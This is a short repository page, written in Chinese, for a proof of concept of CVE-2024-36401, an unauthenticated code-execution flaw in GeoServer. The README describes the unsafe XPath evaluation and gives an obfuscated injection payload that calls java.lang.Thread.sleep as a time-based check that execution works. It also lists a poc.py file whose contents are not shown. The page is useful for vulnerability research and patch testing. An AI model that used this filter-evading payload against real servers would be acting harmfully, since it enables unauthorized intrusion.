CVE-2024-36401 PoC — GeoServer 安全漏洞

Source

Associated Vulnerability

Readme

# CVE-2024-36401
CVE-2024-36401 是由于 GeoServer 使用的 GeoTools 库在解析 XPath 表达式时存在安全问题，导致未授权的攻击者可以通过构造恶意的 OGC 请求参数执行任意代码。

具体来说，该漏洞源于对属性名称作为 XPath 表达式进行不安全的评估，影响所有版本的 GeoServer。

如果有人在复现CVE-2024-36401漏洞时遇到困难，可以尝试以下代码：

```java
/+java.lang.T<!--IgnoreMe!!!!-->hread.s[(: IGNORE :)]leep&#010;&#032;&#009;<![CDATA[
(2000)
]]>
```

这是一个基于时间的代码，可以证明代码执行成功。（java.lang.Thread.sleep）

![image](https://github.com/zgimszhd61/CVE-2024-36401/assets/114722053/b2f08f11-cac4-4456-a25d-39a18b399ca4)

File Snapshot

 [4.0K]  /data/pocs/80487300686ab63b0ad7811dfc0e911ed5e9af31
├── [ 11K]  LICENSE
├── [ 835]  poc.py
└── [ 752]  README.md

0 directories, 3 files

Remarks